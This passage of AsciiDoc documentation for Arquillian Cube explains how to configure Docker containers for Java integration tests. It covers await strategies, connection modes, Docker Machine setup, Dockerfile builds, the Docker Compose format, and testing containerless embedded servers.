the end. But if container is not already running, Cube will start one and stop it at the end of the execution. And last mode is _STARTORCONNECTANDLEAVE_ which is exactly the same of _STARTORCONNECT_ but if container is started by Cube it won\u2019t be stopped at the end of the execution so it can be reused in next executions.\n|===\n\nSome of these properties can be provided by using standard Docker system environment variables so you can set once and use them in your tests too.\nMoreover you can set as Java system properties (-D...) as well.\n\n[cols=\"2*\"]\n|===\n|serverUri\n|DOCKER_HOST\n\n|certPath\n|DOCKER_CERT_PATH\n\n|machineName\n|DOCKER_MACHINE_NAME\n|===\n\nIn the next example you can see a whole YAML document with configuration properties.\nKeep in mind that almost all of them are configuration parameters provided by _Docker_ remote API.\nIn this example we are going to explain the attributes that are most used and special cases.\nOf course not all of them are mandatory:\n\nNOTE: In YAML adding brackets (\"[\" \"]\") is for setting a list.\n\n[[cube-format]]\n[source, yaml]\n----\ntomcat: #1\n image: tutum\/tomcat:7.0 #2\n exposedPorts: [8089\/tcp] #3\n await: #4\n strategy: polling #5\n workingDir: .\n alwaysPull: false\n disableNetwork: true\n hostName: host\n portSpecs: [80,81]\n user: alex\n tty: true\n stdinOpen: true\n stdinOnce: true\n memoryLimit: 1\n memorySwap: 1\n cpuShares: 1\n cpuSet: a\n extraHosts: a\n attachStdin: true\n attachStderr: true\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089] #6\n cmd: [] #7\n dns: [127.0.0.1]\n volumes: [\/tmp]\n volumesFrom: [tomcat]\n binds:\n - \/host:\/container:ro\n links:\n - name:alias\n - name2:alias2\n portBindings: [8089\/tcp, 8081->8080\/tcp] #8\n privileged: true\n publishAllPorts: true\n networkMode: host\n dnsSearch: [127.0.0.1]\n entryPoint: [sh]\n devices:\n cGroupPermissions: a\n pathOnHost: b\n pathInContainer: c\n restartPolicy: #10\n name: failure\n maximumRetryCount: 1\n capAdd: [a]\n capDrop: [b]\n extends: container-id #9\n----\n<1> The name that are going to be assign to running container. It is *mandatory*.\n<2> The name of the image to be used. It is *mandatory*. If the image has not already been pulled by the _Docker_ server, *Arquillian Cube* will pull it for you. If you want to always pull latest image before container is created, you can configure *alwaysPull: true*.\n<3> Sets exposed ports of the running container. It should follow the format _port number_ slash(\/) and _protocol (udp or tcp). Note that it is a list and it is not mandatory.\n<4> After a container is started, it starts booting up the defined services\/commands. Depending on the nature of service, the lifecycle of these services are linked to start up or not. For example Tomcat, Wildlfy, TomEE and in general all Java servers must be started in foreground and this means that from the point of view of the client, the container never finishes to start. But on the other side other services like Redis are started in background and when the container is started you can be sure that Redis server is there. To avoid executing tests before the services are ready, you can set which await strategy should be used from *Arquillian Cube* side to accept that _Docker_ container and all its defined services are up and ready. It is not mandatory and by default polling with _ss_ command strategy is used.\n<5> In +strategy+ you set which strategy you want to follow. Currently three strategies are supported. _static_, _native_ and _polling_.\n<6> You can pass environment variables by using `env`. In this section you can set special `dockerServerIp` string which at runtime will be replaced by _Cube_ to current docker server ip.\n<7> After the container is up, a list of commands can be executed within it.\n<8> Port forwarding is configured using `portBinding` section. It contains a list of `exposedPort` and `port` separated by arrow (_->_). If only one port is provided, *Arquillian Cube* will expose the same port number. In this example the exposed port 8089 is mapped to 8089 and exposed port 8080 is mapped to 8081.\n<9> You can extend another configuration. Any top level element and it's children from the target container-id will be copied over to this configuration, unless they have been defined here already.\n\nAs we've seen in the basic example the definition of the Arquillian Cube scenarios are described in `dockerContainers` property.\nBut if you want you can avoid using this property by simply creating a file called `cube` in the root of the classpath of your project.\n_Arquillian Cube_ will read it as if it was defined in `arquilllian.xml` file.\n\n[source, yaml]\n.src\/test\/resources\/cube\n----\ntomcat:\n image: tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n----\n\n=== Await\n\nAfter a container is started, it starts booting up the defined services\/commands.\nDepending on the nature of service, the lifecycle of these services are linked to start up or not.\nFor example Tomcat, Wildlfy, TomEE and in general all Java servers must be started in foreground and this means that from the point of view of the _Docker_ client, the container never finishes to start.\nBut on the other side other services like Redis are started in background and when the container is started you can be sure that Redis server is there.\nTo avoid executing tests before the services are ready, you can set which await strategy should be used from *Arquillian Cube* side to accept that _Docker_ container and all its defined services are up and ready.\n\nCurrently next await strategies are supported:\n\nnative:: it uses *wait* command. In this case current thread is waiting until the _Docker_ server notifies that has started. In case of foreground services this is not the approach to be used.\npolling:: in this case a polling (with _ping_ or _ss_ command) is executed for 5 seconds against all exposed ports. When communication to all exposed ports is acknowledged, the container is considered to be up. This approach is the one to be used in case of services started in foreground. By default _polling_ executes _ss_ command inside the running container to know if the server is already running. You can use a _ping_ from client by setting +type+ attribute to +ping+; Note that _ping_ only works if you are running _Docker_ daemon on +localhost+. In almost all cases the default behaviour matches all scenarios. If it is not specified, this is the default strategy.\nstatic:: similar to _polling_ but it uses the host ip and specified list of ports provided as configuration parameter. This can be used in case of using _Boot2Docker_.\nsleeping:: sleeps current thread for the specified amount of time. You can specify the time in seconds or milliseconds.\n\nBy default in case you don't specify any _await_ strategy, polling with _ss_ command is used.\n\n[source, yaml]\n.Example native\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: native\n----\n\n[source, yaml]\n.Example polling using ss command by default\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n sleepPollingTime: 200 s #1\n iterations: 3 #2\n----\n<1> Optional parameter to configure sleeping time between poling. You can set in seconds using _s_ or miliseconds using _ms_. By default time unit is miliseconds and value 500.\n<2> Optional parameter to configure number of retries to be done. By default 10 iterations are done.\n\n[source, yaml]\n.Example static\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: static\n ip: localhost\n ports: [8080, 8089]\n----\n\n[source, yaml]\n.Example sleeping\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: sleeping\n sleepTime: 200 s #1\n----\n<1> Optional parameter to configure sleeping time between poling. You can set in seconds using _s_ or miliseconds using _ms_. By default time unit is miliseconds and value 500.\n\n=== Inferring exposedPorts from portBinding\n\nWhen you are using _Docker_ you can set two different parameters, +exposedPort+ and +portBinding+.\n+exposedPorts+ are ports that are available inside _Docker_ infrastructure and they are used for communication between _Docker_ containers but not from outside.\nOn the other side +portBindings+ are a way to instruct _Docker_ container to publish a port to be available from outside (for example from our test).\n\nIt seems reasonable that if you set a port binding this port should automatically be exposed port as well.\nFor this reason in *Arquillian Cube* you can use +portBinding+ and it will automatically set to exposed port.\n\nIn next example we are only setting +portBinding+ and *Arquillian Cube* will instruct _Docker_ to expose port 8080 and of course bind the port 8080 so it can be accessible from outside.\n\n[source, xml]\n.arquillian.xml\n----\ndaytime:\n buildImage:\n dockerfileLocation: src\/test\/resources\/undertow\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n----\n\nAlso it is not necessary to set the network protocol (tcp or udp).\nIf protocol is not specified `portBindings: [\"8080\"]` then _tcp_ is used by default.\nNotice that you need to add double-quotes to stringify the value.\n\n=== Allow connecting to a running container\n\nWith the configuration option +connectionMode+ you can bypass\nthe Create\/Start Cube commands if the a _Docker_ Container with the same name is already\nrunning on the target system. If so, *Arquillian Cube* will reuse that Container moving forward.\n\nThis allows you to prestart the containers manually during development and just\nconnect to them to avoid the extra cost of starting the _Docker_ Containers for each test\nrun. This assumes you are not changing the actual definition of the _Docker_ Container itself.\n\nAn example of this configuration could be:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"connectionMode\">STARTORCONNECT<\/property>\n <property name=\"dockerContainers\">\n tomcat:\n #more properties\n <\/property>\n<\/extension>\n----\n\n+connectionMode+ is an attribute that can receive three parameters:\n\nSTARTANDSTOP:: it is the default one if not set any and simply creates and stops all _Docker_ Containers. If a container is already running, an exception is thrown.\nSTARTORCONNECT:: it tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if it is the case doesn\u2019t stop it at the end. But if container is not already running, Cube will start one and stop it at the end of the execution.\nSTARTORCONNECTANDLEAVE:: it is exactly the same of _STARTORCONNECT_ but if container is started by Cube it won\u2019t be stopped at the end of the execution so it can be reused in next executions.\n\n=== Before Stop Events\n\nSometimes when the tests has finished and container is stopped you want to inspect some data like container console or getting a file from the container to manual inspecting.\nIn these cases you can configure each container to copy console log or copy a file\/s from container to local machine just before container is stopped.\n\nNext snippet shows how to copy a directory from container to local disk:\n\n[source, yaml]\n----\ntomcat_default:\n image: tutum\/tomcat:7.0\n beforeStop: # <1>\n - copy: # <2>\n from: \/test\n to: \/tmp\n\n - log: # <3>\n to: \/tmp\/container.log\n----\n<1> +beforeStop+ goes into the container section and may contain a list of +copy+ and +log+ elements.\n<2> +copy+ is used to notify that we want to copy some directories or files form +from+ container location to +to+ local location.\n<3> +log+ is used to notify that we want to copy container log to +to+ local location.\n\nIn case of +log+ command the standard output and the error output are returned.\n+log+ _Docker_ command can receive some configuration paramters and you can set them too in configuration file.\n\n[source, yaml]\n.Example of log parameters\n----\nbeforeStop:\n - log:\n to: \/tmp\/container.log\n follow: true\n stdout: true\n stderr: false\n timestamps: true\n tail: 10\n----\n\n[[automatic-resolution]]\n=== Automatic serverUri resolution\n\n+serverUri+ parameter is where you configure the Uri of _Docker_ server.\nThis parameter is not mandatory and in case you don't set it, _Arquillian Cube_ will use next values:\n\n[cols=\"2*\"]\n|===\n|Linux\n|unix:\/\/\/var\/run\/docker.sock\n\n|Windows\n|https:\/\/dockerHost:2376\n\n|MacOS\n|https:\/\/dockerHost:2376\n\n|Docker Machine\n|https:\/\/dockerHost:2376\n|===\n\n[[boot2docker]]\n== Boot2Docker and Docker Machine\n\nIf you are using _boot2docker_ or _docker machine_ there are some parameters that depends on the local installation.\nFor example _boot2docker_ ip is not _localhost_ and may change every time you start a new _boot2docker_ instance.\nAlso every time you start _boot2docker_ copies required certificates to home directory of local machine.\n\n_Arquillian Cube_ offers some automatic mechanisms to use _boot2docker_ or _docker machine_ in _Cube_.\n\nThe first one is that +serverUri+ parameter can contain the word +dockerHost+ like for example +https:\/\/dockerHost:2376+.\nWhen _Cube_ is started it will check if the +serverUri+ contains the _dockerHost_ word, and if it is the case it will do next things:\n\n. if docker machine name is provided by using +machineName+ property then Docker Machine command is run to get the ip to be replaced in `dockerHost`.\n. if previous conditions are not met, then _boot2docker_ command is run to get the ip to be replaced in `dockerHost`.\n\n=== Boot2Docker\n\nIn case of _boot2docker_ it will run the command +boot2docker ip+ to get the ip and substitute the _dockerHost_ keyword to the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that +boot2docker+ command is on +PATH+, but you can configure its location by using +boot2dockerPath+ property which is the full location (and program name) of _boot2docker_.\nFor example +\/opt\/boot2dockerhome\/boot2docker+.\n\n_boot2docker_ runs in _https_ and you need to set the certificates path.\nThese certificates are copied by _boot2docker_ by default at +<HOME>\/.boot2docker\/certs\/boot2docker-vm+.\nIf this property is not set and the +serverUri+ contains +dockerHost+, then this property is automatically configured to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+ so you don't need to worry to set for each environment.\n\n=== Docker Machine\n\nIn case of _docker-machine_ it will run the command +docker-machine ip <machineName>+ to get the ip and substitute the _dockerHost_ keyword to the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that +docker-machine+ command is on +PATH+, but you can configure its location by using the +dockerMachinePath+ proeprty which is the full location (and program name too) of _docker-machine_.\nFor example +\/usr\/bin\/docker-machine+..\n\n_docker-machine_ can run with _boot2docker_ together.\nAnd this docker host instance runs in _https_ so you need to set the certificates path.\nThese certificates are copied by _docker-machine_ by default at +<HOME>\/.docker\/machine\/machines+.\nIf this property is not set and _docker-machine_ is run, then this property is automatically configured to default location, so you don't need to worry to set for each environment.\n\nFor example you can configure +arquillian.xml+ file to use _docker-machine_ as:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">${docker.api.version}<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"machineName\">dev<\/property> <!-- 1 -->\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n----\n<1> Sets docker machine to _dev_.\n\nNotice that you only need to add _machineName_ property, everything else it is exactly the same as previous examples.\n\n== Building containers\n\nTo build a container _Docker_ uses a file called +Dockerfile+ http:\/\/docs.docker.com\/reference\/builder\/.\n*Arquillian Cube* also supports building and running a container from a +Dockerfile+.\n\nTo set that *Arquillian Cube* must build the container, the +image+ property must be changed to +buildImage+ and add the location of +Dockerfile+.\n\nLet's see previous example but instead of creating a container from a predefined image, we are going to build one:\n\n[source, yaml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat:\n buildImage: #1\n dockerfileLocation: src\/test\/resources-tomcat-7-dockerfile\/tomcat #2\n noCache: true #3\n remove: true #4\n dockerfileName: my-dockerfile #5\n await:\n strategy: polling\n env: [JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n<\/property>\n----\n<1> +buildImage+ section is used in front of +image+. In case of both sections present in a document, +image+ section has preference over +buildImage+.\n<2> +dockerfileLocation+ contains the location of +Dockerfile+ and all files required to build the container.\n<3> Property to enable or disable the no cache attribute.\n<4> Property to enable or disable the remove attribute.\n<5> Property to set the dockerfile name to be used instead of the default ones.\n\nTIP: +dockerfileLocation+ can be a directory that must contains +Dockerfile+ in root directory (in case you don't set _dockerfileName_ property), also a +tar.gz+ file or a _URL_ pointing to a +tar.gz+ file.\n\nAn example of +Dockerfile+ is:\n\n[source, properties]\n.src\/test\/resources-tomcat-7-dockerfile\/tomcat\/Dockerfile\n----\nFROM tutum\/tomcat:7.0\n\nENV JAVA_OPTS -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\nADD tomcat-users.xml \/tomcat\/conf\/ # <1>\nEXPOSE 8089\nCMD [\"\/tomcat\/bin\/catalina.sh\",\"run\"]\n----\n<1> +tomcat-users.xml+ file is located at same directory as +Dockerfile+.\n\n[[docker-compose-format]]\n== Docker-Compose Format\n\nInstead of using Arquillian Cube format, you can use Docker Compose format to define containers layout. This means that you can use the same Docker Compose file for running your tests with Arquillian Cube and without any change run `docker-compose up` command from terminal and get the same result.\n\nIt is important to note that this is not a docker-compose implementation but only the docker-compose format. This means that for example you cannot execute some CLI commands of _docker-compose_ like start several instances of same service.\n\nIn case of some specific Arquillian Cube attributes like await strategy cannot be configured and the default values are going to be used.\n\nMoreover there are some docker-compose commands that are not implemented yet due to restrictions on docker-java library. These commands are _label_, _pid_, _domainname_, _log_driver_, _security_opt_ and _read_only_. But they will be implemented as soon as docker-java library adds their support.\n\nLast thing, in case you define a command that is not implemented in Arquillian Cube, this command will be ignored (no exception will be thrown), but a log line will be printed notifying this situation. Please it is really important that if this happens you open a bug so we can add support for them. Althought this warning we will try to maintain aligned with the latest docker-compose format.\n\nLet's see how you can rewrite previous HelloWorld example with Tomcat to be used using docker-compose format.\n\nFirst let's create a file called `envs` on root of the project which configures environment variables:\n\n[source]\n.envs\n----\nTOMCAT_PASS=mypass\nJAVA_OPTS=-Djava.rmi.server.hostname=localhost -Dcom.sun.management.jmxremote.rmi.port=8088 -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\n----\n\nThen you can create a file called `docker-compose.yml` following docker-compose commands on root of the project:\n\n[source, yml]\n.docker-compose.yml\n----\ntomcat:\n env_file: envs\n image: tutum\/tomcat:7.0\n ports:\n - \"8089:8089\"\n - \"8088:8088\"\n - \"8081:8080\"\n----\n\nand finally you can configure in `arquillian.xml` file that you want to use docker-compose format.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.13<\/property>\n <property name=\"serverUri\">localhost<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n\n<container qualifier=\"tomcat\">\n <configuration>\n <property name=\"host\">${docker.tomcat.host}<\/property>\n <property name=\"httpPort\">8081<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd that's all, you can now reuse your existing docker-compose files in Arquillian Cube too.\nYou can see the full example at: https:\/\/github.com\/arquillian\/arquillian-cube\/tree\/master\/docker\/ftest-docker-compose\n\n== Enrichers\n\n*Arquillian Cube* comes with a few enrichers.\n\nOne for injecting the +CubeID+(_containerId_) of the current container created for executing the test, one that injects the +CubeController+ to call lifecycle methods on any cube and one that injects +com.github.dockerjava.api.DockerClient+ instance used to communicate with _Docker_ server.\n\nDockerClient injection only work if the tests are run in client mode, that is by using +@RunAsClient+ or by setting the testable property to false +@Deployment(testable = false)+.\n\nThese can be injected using the +@ArquillianResource+ annotation.\n\nAs examples:\n\n[source, java]\n.CubeIDResourceProvider.java\n----\n@ArquillianResource\nCubeID containerId;\n----\n\n[source, java]\n.CubeResourceProvider.java\n----\n@ArquillianResource\nDockerClient dockerClient;\n----\n\n[source, java]\n.CubeControllerProvider.java\n----\n@ArquillianResource\nCubeController cubeController;\n----\n\n=== Auto starting Cubes outside of Arquillian Containers\n\nProbably any application you may write will need an application\/servlet container but also other servers like database server or mail server.\nEach one will be placed on one _Docker Container_.\nSo for example a full application may contain one _Docker Container_ with an application server (for example _Wildfly_) and another container with a database (for example _H2_).\n\n*Arquillian Cube* can orchestrate these containers as well.\n\nAn example of orchestration can be:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"autoStartContainers\">database<\/property> <!--1-->\n<property name=\"dockerContainers\">\n wildfly_database:\n extends: wildfly\n links:\n - database:database #2\n database:\n image: zhilvis\/h2-db\n exposedPorts: [81\/tcp, 1521\/tcp]\n await:\n strategy: polling\n portBindings: [1521\/tcp, 8181->81\/tcp]\n <\/property>\n\n<container qualifier=\"wildfly_database\">\n <configuration>\n <property name=\"target\">wildfly:8.1.0.Final:remote<\/property>\n <property name=\"managementPort\">9991<\/property>\n <property name=\"username\">admin<\/property>\n <property name=\"password\">Admin#70365<\/property>\n <\/configuration>\n<\/container>\n----\n<1> This property is used to start containers before any test is executed. In this case _database_ container.\n<2> We use _link_ property to connect _Wildfly_ container to _database_ container.\n\nIn this case when a test is started both containers are started and when both are ready to receive requests, the test will be executed.\n\nAnd the database definition shall be:\n\n[source, java]\n.UserRepository.java\n----\n@DataSourceDefinition(\n name = \"java:app\/TestDataSource\",\n className = \"org.h2.jdbcx.JdbcDataSource\",\n url = \"jdbc:h2:tcp:\/\/database:1521\/opt\/h2-data\/test\",\n user = \"sa\",\n password = \"sa\"\n)\n@Stateless\npublic class UserRepository {\n\n @PersistenceContext\n private EntityManager em;\n\n public void store(User user) {\n em.persist(user);\n }\n}\n----\n\n=== Auto-Remapping\n\n*Arquillian Cube* can automatically configure default ports of container in case of port forwarding.\n\nWhat *Arquillian Cube* does internally is remapping default `DeployableContainer` port values to the ones configured in _Docker Containers_ configuration.\n\nSuppose you have a _Docker Container_ configuration like:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat_default:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8081->8080\/tcp] #1\n<\/property>\n----\n<1> Note that the exposed port is the 8081.\n\nThen in theory you should configure the remote _Tomcat_ adapter to port 8081 on your _arquillian.xml_ file.\nBut let's say that you are using that remote adapter for a remote local machine _Tomcat_ (outside _Docker_) too, and is configured to use 8080 port.\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"host\">localhost<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nWhich basically uses default port (8080) to connect to remote server.\n\nIn this case you don't need to create a new `container` tag, *Arquillian Cube* is smart enough to change the default port value automatically; in case of _Tomcat_ 8080 to 8081.\n*Arquillan Cube* will apply autoremapping to all properties that contains `port` as a substring of the property, and will remap if it is necessary.\n\nNOTE: Automapping only works in case you want to change the default server port to a _Docker_ port forwarded port.\n\n=== DockerServerIp and Containers\n\nIf you are using a remote docker server (not on _localhost_) or for example _boot2docker_ you may want to set that ip to Arquillian remote adapter configuration so it can deploy the archive under test.\nIn these cases you can hardcode this ip to Arquillian container adapter configuration or you can use the special tag +dockerServerIp+.\nAt runtime these tag will be replaced by _Arquillian Cube_ to docker server ip configured in +serverUri+ parameter.\nThis replacement only works in properties that contains the string +host+ or +address+ in property name.\n\nSo for example:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverUri\">http:\/\/192.168.0.2:2756<\/property> <!--1-->\n ...\n<\/extension>\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"host\">dockerServerIp<\/property> <!--2-->\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n<1> We set the +serverUri+ as usually.\n<2> +dockerServerIp+ is replaced at runtime.\n\nThe +host+ property will be replaced automatically to +192.168.0.2+.\n\nNOTE: This also works in case you set +serverUri+ using +boot2docker+ special word or by using the defaults. Read more about it <<boot2docker, Boot2Docker section>> and <<automatic-resolution, Automatic serverUri resolution section>>.\n\nIn case of using _unix_ socket +dockerServerUri+ is replaced to _localhost_.\n\nAlso _Arquillian Cube_ can help you in another way inferring +boot2docker+ ip.\nIn case you are running in _MACOS_ or _Windows_ with +boot2docker+, you may not need to set host property at all nor using +dockerServerIp+.\n_Arquillian Cube_ will inspect any property in configuration class that contains the word _address_ or _host_ that it is not overriden in `arquillian.xml` and it will set the +boot2docker+ server automatically.\n\nSo previous example could be modified to:\n\n[source.xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd in case you are running on _Windows_ or _MacOS_, `host`property will be automatically set to the +boot2docker +_ip_.\n\n== Containerless Server and Docker\n\nIn all previous sections we have seen that the application is deployed inside a container.\nFor example in case of _Tomcat_ application, resources are deployed inside a _Servlet_ container or for example in case of _Apache TomEE_ you can deploy _EJBs_ inside an _EJB_ container.\n\nBut nowadays there other kind of applications that contains the container (if they have one) embedded inside them.\nTypically these applications uses an embedded server and they are run as _CLI_ applications.\nSome examples can be _Spring Boot_, _Netty_, _SparkJava_ or _Undertow_.\n\nIf you are using some of these technologies with _Docker_, you can still use *Arquillian Cube* to write your tests.\n\n=== Java Embedded Servers\n\nLet's suppose we are writing a service which should return as text the current day and time.\nTo serve this service to the world we decide to use _undertow_ embedded server.\n\nThe code looks like:\n\n[source, java]\n.DaytimeServer.java\n----\nimport io.undertow.Undertow;\nimport io.undertow.server.HttpHandler;\nimport io.undertow.server.HttpServerExchange;\nimport io.undertow.util.Headers;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\n\npublic class DaytimeServer {\n\n public static void main(String[] args) { \/\/<1>\n\n Undertow server = Undertow.builder()\n .addHttpListener(8080, \"0.0.0.0\")\n .setHandler(new HttpHandler() {\n @Override\n public void handleRequest(final HttpServerExchange exchange) throws Exception {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat();\n exchange.getResponseHeaders().put(Headers.CONTENT_TYPE, \"text\/plain\");\n exchange.getResponseSender().send(simpleDateFormat.format(new Date()) + System.lineSeparator()); \/\/<2>\n }\n }).build();\n server.start();\n }\n}\n----\n<1> This class is a CLI application.\n<2> Returns a text with the day and time formatted with +SimpleDateFormat+.\n\nSee that this application is a CLI application which is pretty different from previous examples.\nPreviously the packaged application was deployed inside an application server, which in fact means that *Arquillian* connects to the server and tells it to deploy that file.\n\nIn this example there is no application server nor servlet server waiting for *Arquillian* to deploy an archive but the application is self-contained, it contains everything.\nSo in fact if you want to run the application probably you will end up by doing something like +java -jar daytime.jar+.\n\nSo how to write a test for these classes if we are using _Docker_ as runtime container?\n\nThe first thing to do is add +arquillian-cube-containerless+ dependency.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-containerless<\/artifactId>\n <version>${arquillian.cube.version}<\/version>\n<\/dependency>\n----\n\nNext step is creating a +Dockerfile+.\nThis is required because we need to set not only the container image to be used but how to run the application.\nBut see that there is a problem on creating a +Dockerfile+ in this case.\nThe +jar+ name is not static because it will depend on the name you give during the creation of the archive (using _Shrinkwrap_).\nSo in fact +Dockerfile+ should be templaterized.\nAnd this is something that *Arquillian Cube* can do for you.\nThe idea is creating a file called +DockerfileTemplate+.\n\n[source, terminal]\n.src\/test\/resources\/daytime\/DockerfileTemplate\n----\nFROM java:7\n\nWORKDIR \/usr\/src\/server\nCOPY ${deployableFilename} \/usr\/src\/server\/${deployableFilename} #1\nEXPOSE 8080\nCMD [\"java\", \"-jar\", \"${deployableFilename}\"]\n----\n<1> +${deployableFilname}+ will be replaced at runtime by the name of the +jar+ file created by _Shrinkwrap_.\n\nThen we need to touch +arquillian.xml+ file by setting an special container definition so *Arquillian* doesn't crash because of trying to deploy the archive into a none defined container.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\"> <!--1-->\n daytime:\n buildImage: <!--2-->\n dockerfileLocation: src\/test\/resources\/undertow <!--3-->\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\"> <!--4-->\n <configuration>\n <property name=\"containerlessDocker\">daytime<\/property> <!--5-->\n <property name=\"embeddedPort\">8080<\/property> <!--6-->\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The Docker container is defined as per usual.\n<2> buildImage attribute is used to define the dockerfile location.\n<3> This attribute sets the directory where the +Dockerfile+ is stored. In fact in this case it is the directory where +DockerfileTemplate+ file is stored.\n<4> A container provided by *Arquillian Cube* must be defined.\n<5> This property is used to set which container must be started.\n<6> This property sets the exposed port by the embedded server.\n\nAnd finally the test:\n\n[source, java]\n.DaytimeTest.java\n----\n@RunWith(Arquillian.class)\npublic class DaytimeTest {\n\n private static final String LINE_SEPARATOR = System\n .getProperty(\"line.separator\");\n\n @Deployment(testable = false) \/\/<1>\n public static JavaArchive createDeployment() {\n JavaArchive[] undertow = Maven.resolver().resolve(\"io.undertow:undertow-core:1.1.1.Final\").withTransitivity().as(JavaArchive.class); \/\/<2>\n\n JavaArchive jar = ShrinkWrap\n .create(JavaArchive.class, \"daytime.jar\")\n .addClass(DaytimeServer.class); \/\/<3>\n\n for (JavaArchive javaArchive : undertow) { \/\/<4>\n jar.merge(javaArchive);\n }\n\n jar.addAsManifestResource(\n new StringAsset(\n \"Main-Class: org.arquillian.cube.impl.containerless.DaytimeServer\"\n + LINE_SEPARATOR), \"MANIFEST.MF\"); \/\/<5>\n return jar;\n }\n\n @Test\n public void shouldReturnDateFromDaytimeServer(@ArquillianResource URL base) { \/\/<6>\n try (\n BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, notNullValue());\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> _ShrinkWrap_ Maven resolver gets all dependencies for _Undertow_.\n<3> Create a +jar+ file called +daytime.jar+ with +DaytimeServer+ class.\n<4> +Undertow+ dependencies are merged inside +jar+.\n<5> Because it is a runnable +jar+, +MANIFEST+ is created accordantly.\n<6> Simple test.\n\n=== Polyglot Applications\n\nIn previous section we have seen that we can test any _java_ _CLI_ application that offers a socket connection.\nBut if you think clearly there is nothing that avoid *Arquillian Cube* to deploy applications developed in other languages like _Node.js_, _Play_, _Ruby on Rails_, ...\n\nLet's see an example on how you can use *Arquillian Cube* to test a _Node.js_ _hello world_ application.\n\nFirst thing to do is create the _Node.js_ application.\n\n[source, json]\n.src\/main\/js\/package.json\n----\n{\n \"name\": \"helloworld-server\",\n \"version\": \"0.0.1\",\n \"description\": \"A NodeJS webserver to run inside a docker container\",\n \"author\": \"asotobu@gmail.com\",\n \"license\": \"APLv2\",\n \"dependencies\": {\n \"express\": \"*\"\n },\n \"scripts\": {\"start\": \"node index.js\"}\n}\n----\n\n[source, 